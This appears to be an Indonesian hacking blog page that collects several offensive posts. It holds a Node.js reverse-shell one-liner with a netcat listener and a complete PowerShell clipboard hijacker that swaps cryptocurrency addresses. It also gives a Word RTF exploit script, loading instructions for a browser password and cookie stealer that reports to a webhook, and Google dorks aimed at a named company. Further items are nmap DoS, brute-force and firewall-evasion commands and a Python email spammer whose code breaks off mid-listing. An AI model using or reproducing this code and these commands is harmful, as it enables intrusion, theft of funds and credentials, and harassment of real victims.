Gunakan untuk eksekusi perintah di aplikasi Node.js yang rentan. Berikan HOST sebagai

nama host, alamat IP, atau domain untuk menerima shell terbalik dari server yang rentan.

Javascript:

require('child_process').exec('bash -c "bash -i >& /dev/tcp/HOST/5855 0>&1"')

Listener

hacker@inthehouse:~$ nc -lp 5855

Bagaimana XSS bekerja?

Serangan XSS biasanya melibatkan penyuntikan kode JavaScript berbahaya ke halaman web. Ini dapat dicapai melalui berbagai cara, seperti bypass validasi input, injeksi atribut, injeksi input formulir, injeksi parameter URL, dan injeksi cookie.

Apa saja jenis XSS yang berbeda?

Ada tiga jenis utama XSS: XSS tersimpan, XSS tercermin, dan XSS berbasis DOM. XSS Tersimpan terjadi ketika kode berbahaya disuntikkan ke dalam database dan ditampilkan ke pengguna lain. XSS Tercermin terjadi ketika kode berbahaya disuntikkan ke dalam parameter URL dan ditampilkan kepada pengguna. XSS berbasis DOM terjadi ketika kode berbahaya dijalankan dengan memanipulasi Model Objek Dokumen (DOM) halaman web.

Bagaimana saya bisa mencegah serangan XSS?

Anda dapat mencegah serangan XSS dengan menerapkan berbagai teknik pencegahan, seperti validasi masukan, penyandian keluaran, keamanan cookie, dan menggunakan Kebijakan Keamanan Konten (CSP). Penting untuk memvalidasi input pengguna, menyandikan output, mengamankan cookie Anda, dan menggunakan Kebijakan Keamanan Konten untuk melindungi dari serangan XSS.

Apa saja contoh umum serangan XSS?

Beberapa contoh umum serangan XSS termasuk mencuri cookie, mengarahkan pengguna ke situs web jahat, mencuri data pengguna, memasang malware, dan melakukan tindakan atas nama pengguna.

Bagaimana saya bisa menguji kerentanan XSS di aplikasi web saya?

Anda dapat menguji kerentanan XSS di aplikasi web Anda menggunakan berbagai alat dan teknik, seperti pengujian manual, pengujian otomatis, dan pemindai kerentanan. Penting untuk menguji aplikasi web Anda secara teratur untuk kerentanan XSS guna memastikan keamanannya.

Apa saja praktik terbaik untuk mencegah serangan XSS?

Beberapa praktik terbaik untuk mencegah serangan XSS termasuk memvalidasi input pengguna, mengodekan output, menggunakan Kebijakan Keamanan Konten, menerapkan keamanan cookie, dan terus mengikuti praktik terbaik dan pembaruan keamanan. Selain itu, mengedukasi pengguna tentang risiko serangan XSS dan cara melindungi diri sendiri juga dapat membantu mencegah serangan XSS.

Serangan XSS dapat menimbulkan konsekuensi serius bagi aplikasi web dan penggunanya. Namun, dengan mengikuti teknik pencegahan yang diuraikan dalam lembar contekan XSS kami, Anda dapat mengurangi risiko kerentanan XSS secara signifikan. Ingatlah untuk selalu memvalidasi input pengguna, menyandikan output, mengamankan cookie Anda, dan menggunakan Kebijakan Keamanan Konten untuk melindungi dari serangan XSS.

Crypto clipboard Hijacker

2023-03-09T09:35:00.004-08:00

Ini adalah skrip PowerShell untuk pembajak clipboard khusus untuk crypto. (jangan bodoh untuk menjalankan pws ini di sistem utama Anda, gunakan VM)

hal-hal yang saya tambahkan sebagai berikut

Fix registry startup
Add hidden attributes
Add drop to temp with random 15 char name
Add obfuscation
Add delete windows 10 defender
Add to be able to set the execution policy as unrestricted upon running the clipper

Add-Type -Name Window -Namespace Console -MemberDefinition '

[DllImport("Kernel32.dll")]

public static extern IntPtr GetConsoleWindow();

[DllImport("user32.dll")]

public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

public static void Hide()

{

    IntPtr hWnd = GetConsoleWindow();

    if(hWnd != IntPtr.Zero)

    {

        ShowWindow(hWnd, 0);

    }

}

'

[Console.Window]::Hide()

$addy = @{

    "BTC" = "Your btc addy"

    "ETH" = "Your eth addy"

    "LTC" = "Your ltc addy"

    "TRX" = "Your trx addy"

    "XMR" = "Your xmr addy"

}

while ($true) {

    $clipper = Get-Clipboard

    if ($clipper -match "^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$") {

        $clipper = $addy["BTC"]

        [System.Windows.Forms.Clipboard]::SetText($clipper)

    }

   

    elseif ($clipper -match "^0x[a-fA-F0-9]{40}$") {

        $clipper = $addy["ETH"]

        [System.Windows.Forms.Clipboard]::SetText($clipper)

    }

   

    elseif ($clipper -match "^[LM][a-km-zA-HJ-NP-Z1-9]{26,33}$") {

        $clipper = $addy["LTC"]

        [System.Windows.Forms.Clipboard]::SetText($clipper)

    }

   

    elseif ($clipper -match "^T[a-zA-HJ-NP-Z0-9]{33}$") {

        $clipper = $addy["TRX"]

        [System.Windows.Forms.Clipboard]::SetText($clipper)

    }

   

    elseif ($clipper -match "^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$") {

        $clipper = $addy["XMR"]

        [System.Windows.Forms.Clipboard]::SetText($clipper)

    }

    Start-Sleep -Seconds 1

}

CVE-2023-21716 (Microsoft Word RCE) Python PoC

2023-03-06T10:46:00.003-08:00

CNA:  Microsoft Corporation (more like telemetry corporation)[/align]
[align=center]Base Score:  9.8 CRITICAL [/align]
[align=center]Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Ini adalah kerentanan korupsi tumpukan di parser RTF Microsoft Word yang, jika dipicu, memungkinkan penyerang mencapai eksekusi kode jarak jauh dengan hak istimewa korban. Cacat ini tidak memerlukan autentikasi sebelumnya: penyerang cukup mengirim file RTF yang berisi jebakan ke korban melalui email.

“Microsoft Office 2010 dan yang lebih baru menggunakan Tampilan Terproteksi untuk membatasi kerusakan yang disebabkan oleh dokumen berbahaya yang diperoleh dari sumber yang tidak tepercaya. Tampilan Terproteksi berlaku saat kerentanan ini muncul dan dengan demikian kerentanan keluar kotak pasir tambahan akan diperlukan untuk mendapatkan hak istimewa penuh

open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

Google Dorks Yang Harus Diketahui

2023-02-19T19:02:00.003-08:00

Google dorks adalah istilah penelusuran khusus yang dapat membantu Anda menemukan informasi sensitif seperti nama pengguna, kata sandi, nomor kartu kredit, alamat email, skrip shell, akun pengguna, dan sebagainya.

Sebenarnya Dorks ini tidak terbatas pada Google. Kita juga dapat menggunakannya dengan mesin pencari seperti Bing dan Yahoo. Hasilnya mungkin berbeda-beda, tetapi tetap melayani tujuan yang sama.

Untuk memanfaatkan potensi penuh dari Google Dorking, kita perlu menguasai beberapa operator pencarian khusus. Operator ini akan menyempurnakan hasil pencarian dan membantu menemukan dengan tepat apa yang kita cari.

Mari kita coba beberapa Google dorks.

Google dork Favorit Saya

Mulailah dengan “situs:<domain>”. Kemudian, kecualikan halaman membosankan dengan "-www" atau istilah lain sampai Anda menemukan hal menarik:

site:tesla.com -www -shop -share -ir -mfa

Kebocoran Pastebin

Lihat situs-situs seperti pastebin, jsfiddle, dan codebeautify untuk kode yang tersisa dari pengembang:

site:pastebin.com
site:jsfiddle.net
site:codebeautify.org
site:codepen.io "tesla.com"

Ekstensi PHP dengan parameter

Gunakan "ext:php" dan "inurl:?" bersama dengan domain untuk menemukan file .php dengan tanda tanya di url:

site:tesla.com ext:php inurl:?

Mengungkapkan XSS dan Membuka Redirect Bug Bounty

Lihat bounty bug yang diperbaiki dan tidak diperbaiki yang diungkapkan secara publik melalui OpenBugBounty:

site:openbugbounty.org inurl:reports intext:"yahoo.com"

Gabungkan dork Anda

Gunakan “|” operator untuk menyertakan kedua kueri atau operator "&" untuk meminta kedua kueri. Berikut adalah contoh upaya mencari titik akhir pengunggahan file di beberapa domain:

(site:tesla.com | site:teslamotors.com) & ”choose file”

Bonus Dork: Mesin pencari alternatif

Coba mesin pencari lain seperti DuckDuckGo, Bing, Baidu, dan Dogpile untuk memperluas temuan Anda.

Pengambil kata sandi [C#]

2023-02-18T10:47:00.004-08:00

Sumber Github

browser-mal

Ini dibuat untuk digunakan dengan bash bunny untuk bereksperimen dengan muatan. Tolong jangan gunakan untuk kegiatan ilegal.

Menggabungkan Dll

ILMerge.exe /out:browser.mal.dll BrowserMal.dll BouncyCastle.Crypto.dll Newtonsoft.Json.dll

Penggunaan

BrowserMal.Class1.StartCreds(<webhook>, extractWifi: true);

Powershell

$bytes = [System.IO.File]::ReadAllBytes("PATH TO DLL")
$assembly = [System.Reflection.Assembly]::Load($bytes)

$entryPointMethod = $assembly.GetTypes().Where({ $_.Name -eq 'Class1' }, 'First').GetMethod('StartCreds', [Reflection.BindingFlags] 'Static, Public, NonPublic')

$entryPointMethod.Invoke($null, @('WEBHOOK', $true))

Kegunaan

Mengekstrak kata sandi, cookie, kartu kredit, dan alamat dari browser berbasis tokek dan kromium.
Ekstrak kata sandi wifi yang disimpan.
Ekstrak discortd token.

Phishing Tool dengan SocialFish

2023-02-08T10:03:00.004-08:00

Sumber Github

DIGUNAKAN HANYA UNTUK TUJUAN PENDIDIKAN.

Penggunaan SocialFish adalah TANGGUNG JAWAB PENUH dari PENGGUNA AKHIR. Pengembang TIDAK bertanggung jawab atas penyalahgunaan atau kerusakan yang disebabkan oleh program ini.

"DITANGGAPI. DALAM HAL APAPUN PEMEGANG HAK CIPTA ATAU KONTRIBUTOR TIDAK BERTANGGUNG JAWAB ATAS KERUSAKAN LANGSUNG, TIDAK LANGSUNG, INSIDENTAL, KHUSUS, CONTOH, ATAU KONSEKUENSIAL (TERMASUK, NAMUN TIDAK TERBATAS PADA, PENGADAAN BARANG ATAU LAYANAN PENGGANTI; HILANGNYA PENGGUNAAN, DATA, ATAU KEUNTUNGAN; ATAU GANGGUAN BISNIS) NAMUN PENYEBABNYA DAN BERDASARKAN TEORI TANGGUNG JAWAB APA PUN, BAIK DALAM KONTRAK, KEWAJIBAN KERAS, ATAU KERUGIAN (TERMASUK KELALAIAN ATAU LAINNYA) YANG TIMBUL DALAM CARA APAPUN DARI PENGGUNAAN PERANGKAT LUNAK INI, BAHKAN JIKA DIBERITAHU TENTANG KEMUNGKINAN KERUSAKAN TERSEBUT." Diambil dari LISENSI.

Nmap untuk Ethical Hacker

2023-01-30T08:24:00.009-08:00

Nmap untuk Ethical Hackers. Di sini Anda akan mengetahui tentang nmap dari dasar hingga lanjutan. Dalam tulisan ini. Ditulisan ini kita akan membahas:

TCP, UDP, FIN, TCP SYN, Idle, Pindai Ping
Deteksi Versi
Pindai port tertentu
Pindai host dan alamat IP
Deteksi CVE
Spoofing Alamat Mac
Meluncurkan DDOS dengan nmap
Meluncurkan serangan bruteforce
Pindai + deteksi layanan OS
Pemindaian idle zombie
Mendeteksi infeksi malware

Dan parameter serta teknik pemindaian & metodologi yang jauh lebih penting.

Pemindaian UDP (-sU)

Teknik ini digunakan untuk memindai port UDP yang terbuka dari IP/host target. Di sini, pemindaian UDP mengirimkan Paket UDP ke setiap port target dan menunggu hingga mendapat respons. Jika, ia menerima pesan kesalahan yang menyatakan bahwa ICMP tidak dapat dijangkau, ini berarti port tersebut ditutup. Namun, jika mendapat respons yang dapat didekati, berarti port tersebut terbuka.

Command: nmap -sU <target>

Pindai FIN (-sF)

Dalam teknik Fin Scan, paket dikirim dengan Fin Flag. Terkadang, karena firewall, Paket SYN mungkin diblokir. Dalam kasus seperti itu, FIN Scan bekerja dengan melewati firewall. Paket FIN dikirim ke port tertutup, jika tidak ada tanggapan yang diterima, itu karena paket dijatuhkan oleh firewall atau port terbuka.

Command: nmap -sF <target>

Pindai Ping (-sP)

Teknik ini hanya digunakan untuk mengetahui apakah host tersedia atau tidak. Ping Scan tidak digunakan untuk mendeteksi port terbuka. Ini mengirimkan permintaan gema ICMP dan sebagai gantinya mendapat balasan gema ICMP jika tuan rumah masih hidup.

Command: nmap -sP <target>

Pemindaian TCP SYN (-sS)

Dalam teknik ini, Nmap mengirim paket SYN ke tujuan, tetapi tidak membuat sesi apa pun. Akibatnya, komputer target tidak akan dapat membuat log interaksi apa pun karena tidak ada sesi yang dimulai.

Command: nmap -sS <target>

TCP Connect() Pindai (-sT)

Soket UNIX menggunakan panggilan sistem bernama connect() untuk memulai koneksi TCP dan jika berhasil, koneksi dapat dibuat dan jika gagal, koneksi tidak dapat dibuat, pada dasarnya karena port mungkin ditutup.

Command: nmap -sT <target>

Deteksi Versi (-sV)

Teknik ini digunakan untuk mencari tahu tentang layanan tertentu yang berjalan pada port terbuka, yaitu versi dan nama produk. Itu tidak digunakan untuk mendeteksi port terbuka. Namun, pemindaian ini memerlukan port terbuka untuk mendeteksi versinya. Ini menggunakan pemindaian TCP SYN untuk mengetahui tentang port terbuka.

Command: nmap -sV <target>

Pemindaian idle/Diam (-sI)

Pemindaian diam adalah pemindaian lanjutan yang tidak mengirim paket apa pun dari alamat IP Anda, melainkan menggunakan host lain dari jaringan target untuk mengirim paket.

Command: nmap -sI <target>

Pemindaian Nmap Dasar terhadap ip atau host:

nmap <target>

Sekarang, jika Anda ingin memindai nama host, cukup ganti IP untuk host tersebut, seperti yang Anda lihat di bawah:

nmap domain.com

Pemindaian semacam ini, seperti host pemindaian Nmap, sempurna untuk langkah pertama Anda saat memulai dengan Nmap.

Nmap (pemindaian ping)

nmap -sp 192.168.5.0/24

Jenis pemindaian yang paling terkenal adalah pemindaian ping Nmap (disebut demikian karena sering digunakan untuk melakukan sapuan ping Nmap), dan ini merupakan cara termudah untuk mendeteksi host di jaringan apa pun.

Kelemahan dari jenis pemindaian khusus ICMP ini adalah bahwa host jarak jauh sering memblokir paket ping berbasis IP, jadi jika Anda tidak bisa mendapatkan hasil yang solid, sebaiknya beralih ke permintaan berbasis ARP untuk pemindaian Anda.

Pindai port tertentu atau pindai seluruh rentang port host:

nmap -p 1-65535 <target>

Dalam contoh ini, kami memindai semua port 65535 untuk target kami.

Nmap dapat memindai semua kemungkinan port, tetapi Anda juga dapat memindai port tertentu, yang akan melaporkan hasil lebih cepat. Lihat di bawah:

nmap -p 80,443 192.168.1.1

Pindai host dan pembacaan alamat ip dari file teks:

Dalam hal ini, Nmap juga berguna untuk membaca file yang berisi host dan IP didalamnya. Misalkan Anda membuat file list.txt yang berisi baris-baris berikut di dalamnya:

192.168.1.106
cloudflare.com
microsoft.com
google.com

Parameter "-iL" memungkinkan Anda membaca dari file itu, dan memindai semua host tersebut untuk Anda:

nmap -iL list.txt

Simpan hasil pemindaian nmap Anda dalam file teks:

Di sisi lain, dalam contoh berikut kita tidak akan membaca dari file, tetapi mengekspor/menyimpan hasil kita ke dalam file teks:

nmap -oN output.txt google.com

Nmap juga memiliki kemampuan untuk mengekspor file ke dalam format XML, lihat contoh berikut:

nmap -oX output.xml google.com

Menonaktifkan resolusi nama DNS:

Jika Anda perlu sedikit mempercepat pemindaian, Anda selalu dapat memilih untuk menonaktifkan resolusi DNS terbalik untuk semua pemindaian Anda. Cukup tambahkan parameter "-n" dan -Pn untuk menghindari penemuan host.

nmap -p 80 -n -Pn 192.168.1.1

Lihat perbedaannya dengan pemindaian yang mengaktifkan resolusi DNS normal:

nmap -p 80 192.168.1.1

Pindai OS dan deteksi layanan:

Menggunakan parameter "-A" memungkinkan Anda melakukan deteksi OS dan layanan, dan pada saat yang sama kami menggabungkannya dengan "-T4" untuk eksekusi yang lebih cepat. Lihat contoh di bawah ini:

nmap -A -T4 cloudflare.com

Pindai menggunakan protokol TCP atau UDP:

Salah satu hal yang paling kami sukai dari Nmap adalah fakta bahwa Nmap berfungsi untuk protokol TCP dan UDP. Dan sementara sebagian besar layanan berjalan di TCP, Anda juga bisa mendapatkan keuntungan besar dengan memindai layanan berbasis UDP. Mari kita lihat beberapa contoh.

Hasil pemindaian TCP menggunakan parameter “-sT”:

nmap -sT 192.168.1.1

Hasil pemindaian UDP menggunakan parameter “-sU”:

nmap -sU 192.168.1.1

Mesin Skrip Nmap (NSE)

Apa itu NSE?

Nmap Scripting Engine (NSE) adalah salah satu fitur Nmap yang paling kuat dan fleksibel. Hal ini memungkinkan pengguna untuk menulis (dan berbagi) skrip sederhana untuk mengotomatiskan berbagai tugas jaringan. Skrip tersebut kemudian dieksekusi secara paralel dengan kecepatan dan efisiensi yang Anda harapkan dari Nmap. Pengguna dapat mengandalkan kumpulan skrip yang tumbuh dan beragam yang didistribusikan dengan Nmap, atau menulis skrip mereka sendiri untuk memenuhi kebutuhan khusus.

NSE dirancang agar serbaguna, dengan mempertimbangkan tugas-tugas berikut:

1. Penemuan jaringan

Ini adalah roti dan mentega Nmap. Contohnya termasuk mencari data whois berdasarkan domain target, menanyakan ARIN, RIPE, atau APNIC untuk IP target guna menentukan kepemilikan, melakukan pencarian identitas pada port terbuka, kueri SNMP, dan mencantumkan berbagi dan layanan NFS/SMB/RPC yang tersedia.

2. Deteksi versi yang lebih canggih

Sistem deteksi versi Nmap mampu mengenali ribuan layanan yang berbeda melalui sistem pencocokan tanda tangan berbasis probe dan ekspresi reguler, tetapi tidak dapat mengenali semuanya. Misalnya, mengidentifikasi layanan Skype v2 memerlukan dua pemeriksaan independen, yang deteksi versinya tidak cukup fleksibel untuk ditangani. Nmap juga dapat mengenali lebih banyak layanan SNMP jika mencoba beberapa ratus nama komunitas yang berbeda dengan kekerasan. Tak satu pun dari tugas-tugas ini cocok untuk deteksi versi Nmap tradisional, tetapi keduanya mudah diselesaikan dengan NSE. Untuk alasan ini, deteksi versi sekarang memanggil NSE secara default untuk menangani beberapa layanan rumit.

3. Deteksi kerentanan

Ketika kerentanan baru ditemukan, Anda sering ingin memindai jaringan Anda dengan cepat untuk mengidentifikasi sistem yang rentan sebelum orang jahat melakukannya. Meskipun Nmap bukan pemindai kerentanan yang komprehensif, NSE cukup kuat untuk menangani bahkan pemeriksaan kerentanan yang menuntut. Saat bug Heartbleed memengaruhi ratusan ribu sistem di seluruh dunia, pengembang Nmap merespons dengan skrip deteksi ssl-heartbleed dalam waktu 2 hari. Banyak skrip deteksi kerentanan sudah tersedia dan kami berencana untuk mendistribusikan lebih banyak lagi saat ditulis.

4. Deteksi backdoor

Banyak penyerang dan beberapa worm otomatis meninggalkan pintu belakang untuk memungkinkan masuk kembali nanti. Beberapa di antaranya dapat dideteksi oleh deteksi versi berbasis ekspresi reguler Nmap, tetapi worm dan backdoor yang lebih kompleks membutuhkan kemampuan canggih NSE untuk mendeteksi secara andal. NSE telah digunakan untuk mendeteksi backdoor Double Pulsar NSA di SMB dan versi backdoor dari UnrealIRCd, vsftpd, dan ProFTPd.

5. Eksploitasi kerentanan

Sebagai bahasa skrip umum, NSE bahkan dapat digunakan untuk mengeksploitasi kerentanan daripada hanya menemukannya. Kemampuan untuk menambahkan skrip eksploitasi khusus mungkin bermanfaat bagi sebagian orang (khususnya penguji penetrasi), meskipun kami tidak berencana mengubah Nmap menjadi kerangka kerja eksploitasi seperti Metasploit.

Item yang terdaftar ini adalah tujuan awal kami, dan kami mengharapkan pengguna Nmap untuk menghasilkan penggunaan NSE yang lebih inventif.

Skrip ditulis dalam bahasa pemrograman Lua tersemat, versi 5.3. Bahasa itu sendiri didokumentasikan dengan baik dalam buku Pemrograman di Lua, Edisi Keempat dan Manual Referensi Lua 5.2. Manual referensi, diperbarui untuk Lua 5.3, juga tersedia secara online.

NSE diaktifkan dengan opsi -sC (atau --script jika Anda ingin menentukan sekumpulan skrip khusus) dan hasilnya diintegrasikan ke dalam keluaran Nmap normal dan XML.

6. Deteksi CVE menggunakan Nmap

Salah satu fitur terhebat Nmap yang tidak semua administrator jaringan dan sistem ketahui adalah sesuatu yang disebut “Nmap Scripting Engine” (dikenal sebagai NSE). Mesin skrip ini memungkinkan pengguna untuk menggunakan serangkaian skrip yang telah ditentukan sebelumnya, atau menulis sendiri menggunakan bahasa pemrograman Lua.

Menggunakan skrip Nmap sangat penting untuk mengotomatiskan pemindaian sistem dan kerentanan. Misalnya, jika Anda ingin menjalankan pengujian kerentanan penuh terhadap target, Anda dapat menggunakan parameter berikut:

nmap -Pn --script vuln 192.168.1.105

7. Meluncurkan serangan DOS dengan nmap

Fitur Nmap sepertinya tidak pernah berakhir, dan berkat NSE, itu bahkan memungkinkan kami meluncurkan serangan DOS terhadap pengujian jaringan kami.

misalnya kita dapat mencoba mengeksploitasi kerentanan slowloris dengan meluncurkan serangan DOS dalam loop selamanya:

nmap 192.168.1.105 -max-parallelism 8

00 -Pn --script http-slowloris --script-args http-slowloris.runforever=true

8. Meluncurkan serangan bruteforce dengan nmap

NSE sangat menarik – berisi skrip untuk semua yang dapat Anda bayangkan. Lihat tiga contoh BFA berikutnya terhadap WordPress, MSSQL, dan server FTP:

1. Serangan brute force WordPress:

nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3 ,brute.firstonly=true' 192.168.1.105

2. Serangan brute force terhadap MS-SQL:

nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105

3. Serangan brute force FTP:

nmap --script ftp-brute -p 21 192.168.1.105

9. Mendeteksi infeksi malware pada remote host

Nmap mampu mendeteksi malware dan backdoors dengan menjalankan pengujian ekstensif pada beberapa layanan OS populer seperti pada Identd, Proftpd, Vsftpd, IRC, SMB, dan SMTP. Ini juga memiliki modul untuk memeriksa tanda-tanda malware populer di dalam server jarak jauh dan juga mengintegrasikan database Safe Browsing dan VirusTotal Google.

Pemindaian malware umum dapat dilakukan dengan menggunakan:

nmap -sV --script=http-malware-host 192.168.1.105

Atau menggunakan cek Malware Google:

nmap -p80 --script http-google-malware infectedsite.com

Mendeteksi infeksi malware pada remote host

1. Paket Fragmen

Teknik ini sangat efektif terutama di masa lalu namun Anda masih dapat menggunakannya jika menemukan firewall yang tidak dikonfigurasi dengan benar. Nmap menawarkan kemampuan untuk memecah-mecah paket saat memindai dengan opsi -f sehingga dapat melewati pemeriksaan paket firewall.

2. Tentukan MTU tertentu

Nmap memberikan opsi kepada pengguna untuk mengatur MTU (Maximum Transmission Unit) tertentu ke paket. Ini mirip dengan teknik fragmentasi paket yang telah kami jelaskan di atas. Selama pemindaian, ukuran nmap akan membuat paket berdasarkan ukuran pada nomor yang akan kami berikan. Pada contoh ini kami memberikan nomor 24 sehingga nmap akan membuat paket 24 byte yang menyebabkan kebingungan pada firewall.

Perlu diingat bahwa nomor MTU harus kelipatan 8 (8,16,24,32 dst). Anda dapat menentukan MTU pilihan Anda dengan perintah –mtu target nomor.

3. Gunakan alamat Decoy

Dalam jenis pemindaian ini Anda dapat menginstruksikan Nmap untuk memalsukan paket dari host lain. Dalam log firewall tidak hanya alamat IP kami tetapi juga alamat IP umpan sehingga akan lebih sulit untuk menentukan dari sistem mana pemindaian dimulai.

Ada dua opsi yang dapat Anda gunakan dalam jenis pemindaian ini:

nmap -D RND:10 [target] (Menghasilkan umpan dalam jumlah acak)
nmap -D decoy1,decoy2,decoy3 dll. (Tentukan alamat IP umpan secara manual)

4. Pemindaian Zombie Menganggur

Teknik ini memungkinkan Anda untuk menggunakan host lain di jaringan yang tidak aktif untuk melakukan pemindaian port ke host lain. Keuntungan utama dari metode ini adalah sangat tersembunyi karena file log firewall akan mencatat alamat IP Zombie dan bukan IP kami.

Namun untuk mendapatkan hasil yang tepat kita harus menemukan host yang menganggur di jaringan.

Kerangka kerja Metasploit memiliki pemindai yang dapat membantu kami menemukan host yang menganggur di jaringan dan dapat digunakan saat mengimplementasikan jenis pemindaian ini.

nmap -sI [Zombie IP] [IP Target]

5. Spesifikasi nomor port sumber

Kesalahan umum yang dilakukan banyak administrator saat mengonfigurasi firewall adalah menyiapkan aturan untuk mengizinkan semua lalu lintas masuk yang berasal dari nomor port tertentu.

Opsi –source-port dari Nmap dapat digunakan untuk mengeksploitasi kesalahan konfigurasi ini. Port umum yang dapat Anda gunakan untuk jenis pemindaian ini adalah: 20,53 dan 67.

6. Tambahkan Data acak

Banyak firewall memeriksa paket dengan melihat ukurannya untuk mengidentifikasi potensi pemindaian port. Ini karena banyak pemindai mengirimkan paket yang memiliki ukuran tertentu.

Untuk menghindari deteksi semacam itu, Anda dapat menggunakan perintah –data-length untuk menambahkan data tambahan dan mengirim paket dengan ukuran yang berbeda dari default.

7. Pindai dengan Urutan Acak

Dalam teknik ini Anda dapat memindai sejumlah host dalam urutan acak dan tidak berurutan. Perintah yang Anda gunakan untuk menginstruksikan Nmap untuk memindai host dalam urutan acak adalah –randomize-hosts.

Teknik ini dikombinasikan dengan opsi pengaturan waktu yang lambat dalam perintah nmap bisa sangat efektif ketika Anda tidak ingin memperingatkan firewall.

8. Spoofing Alamat Mac

Metode lain untuk melewati batasan firewall saat melakukan pemindaian port adalah dengan memalsukan alamat MAC host Anda. Teknik ini bisa sangat efektif terutama jika ada aturan penyaringan MAC yang hanya mengizinkan lalu lintas dari alamat MAC tertentu sehingga Anda perlu menemukan yang mana Alamat MAC yang perlu Anda atur untuk mendapatkan hasil.

Secara khusus opsi –spoof-mac memberi Anda kemampuan untuk memilih alamat MAC dari vendor tertentu, untuk memilih alamat MAC acak atau untuk mengatur alamat MAC tertentu pilihan Anda.

Keuntungan lain dari spoofing alamat MAC adalah Anda membuat pemindaian Anda lebih tersembunyi karena alamat MAC asli Anda tidak akan muncul di file log firewall.

Tentukan alamat MAC dari Vendor —-> –spoof-mac Dell/Apple/3Com

Hasilkan alamat MAC acak —-> —spoof-mac 0

Tentukan alamat MAC Anda sendiri —-> —spoof-mac 00:01:02:25:56:AE

9. Kirim Checksum Buruk

Checksum digunakan oleh protokol TCP/IP untuk memastikan integritas data. Namun pengiriman paket dengan checksum yang salah dapat membantu Anda menemukan informasi dari sistem yang tidak dikonfigurasi dengan benar atau saat Anda mencoba menghindari firewall.

Anda dapat menggunakan perintah nmap –badsum IP untuk mengirim paket dengan checksum buruk ke target Anda.

Jika tidak mendapatkan hasil apa pun. Ini berarti bahwa sistem telah dikonfigurasi dengan benar.

Saya harap Anda telah mempelajari sesuatu yang baru dari tulisan ini.

Python Mail Spammer (ke satu target) [SMTP]

2023-01-27T08:22:00.017-08:00

Penggunaan alamat E-Mail ke port SMTP harus terbuka. Cara membukanya dijelaskan di situs web perusahaan surat terkait. Kemungkinan besar di bagian pengaturan di halaman beranda email.

Semua informasi yang diperlukan dalam aplikasi harus diisi (Subjek, konten, waktu tunggu, dll.). Jika tidak, program tidak akan berjalan dan ditutup.

Setelah mengklik mulai spam, aplikasi tidak merespons atau menunjukkan bahwa ia terus memuat, jangan panik karena ini BUKAN kesalahan.

Jangan paksa menutup aplikasi.

Penyelesaian proses akan bervariasi sesuai dengan waktu tunggu dan berapa banyak spam yang akan dikirimkan.

Waktu hasil rata-rata adalah 40 detik untuk 10 spam dan waktu tunggu 2 detik.

Dalam daftar spam, proses ini mungkin sedikit meningkat, karena spam akan dihapus dari setiap akun.

Perusahaan email yang dapat digunakan untuk spam tercantum di bawah ini:

@hotmail.com
@outlook.com
@outlook.com.tr
@gmx.com

Download .exe file link

Python Kode

import smtplib
import sys
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from PyQt5.QtWidgets import QWidget,QApplication,QLabel,QHBoxLayout,QPushButton,QVBoxLayout,QLineEdit,QFileDialog,QRadioButton
import os
from time import sleep

class Pencere(QWidget):
    def __init__(self):

        super().__init__()

        self.anamenu()
    def anamenu(self):

        self.tekkisi = QRadioButton("TEK MAİL ADRESİ İLE SPAM")
        self.liste = QRadioButton("MAİL LİSTESİ İLE SPAM")
        self.buton = QPushButton("Devam et")
        hbox = QHBoxLayout()
        hbox.addWidget(self.tekkisi)
        hbox.addWidget(self.liste)
        hbox.addWidget(self.buton)
        self.setLayout(hbox)
        self.setWindowTitle("E-Mail Spam Uygulaması V1.0")
        self.show()

        self.buton.clicked.connect(lambda: self.sec(self.liste.isChecked(),self.tekkisi.isChecked()))

    def sec(self, liste, tekkisi):
        if liste:
            listeekrani.show()

        if tekkisi:
            tekkisiekrani.show()


class Listeekrani(QWidget):
    def __init__(self):
        super().__init__()
        self.listelispam()

    def listelispam(self):

        self.emailadresilist = QPushButton("E-Mail Listesi Aktar")
        self.emailadresilistonay = QLabel("")

        self.kimespam = QLineEdit()
        self.kimespam_L = QLabel("Spam Yapılacak Kişinin E-Mail Adresi")

        self.konubasligi = QLineEdit()
        self.konubasligi_L = QLabel("Konu Başlığı")

        self.icerik = QLineEdit()
        self.icerik_L = QLabel("E-Mail İçeriği")

        self.kactane = QLineEdit()
        self.kactane_L = QLabel("Listedeki Her Hesap Kaç Adet E-Posta Göndersin?")

        self.bekle = QLineEdit("0")
        self.bekle_L = QLabel("Her Postadan Sonra Kaç Saniye Beklesin")



        self.spam = QPushButton("Spama Başla")
        self.cikti = QLabel("")

        hbox = QHBoxLayout()
        hbox.addWidget(self.emailadresilistonay)
        hbox.addWidget(self.emailadresilist)

        hbox3 = QHBoxLayout()
        hbox3.addWidget(self.kimespam_L)
        hbox3.addWidget(self.kimespam)


        hbox4 = QHBoxLayout()
        hbox4.addWidget(self.konubasligi_L)
        hbox4.addWidget(self.konubasligi)

        hbox5 = QHBoxLayout()
        hbox5.addWidget(self.icerik_L)
        hbox5.addWidget(self.icerik)

        hbox6 = QHBoxLayout()
        hbox6.addWidget(self.kactane_L)
        hbox6.addWidget(self.kactane)

        hbox7 = QHBoxLayout()
        hbox7.addWidget(self.bekle_L)
        hbox7.addWidget(self.bekle)

        hboxalt = QHBoxLayout()
        hboxalt.addWidget(self.spam)
        hboxalt.addWidget(self.cikti)
        hboxalt.addStretch()

        self.v_box = QVBoxLayout()
        self.v_box.addStretch()
        self.v_box.addLayout(hbox)
        self.v_box.addLayout(hbox3)
        self.v_box.addLayout(hbox4)
        self.v_box.addLayout(hbox5)
        self.v_box.addLayout(hbox6)
        self.v_box.addLayout(hbox7)
        self.v_box.addLayout(hboxalt)

        self.setLayout(self.v_box)


        self.setWindowTitle("Liste ile Spam")
        self.spam.clicked.connect(self.spamabasla)
        self.emailadresilist.clicked.connect(self.emaillist)


    def emaillist(self):
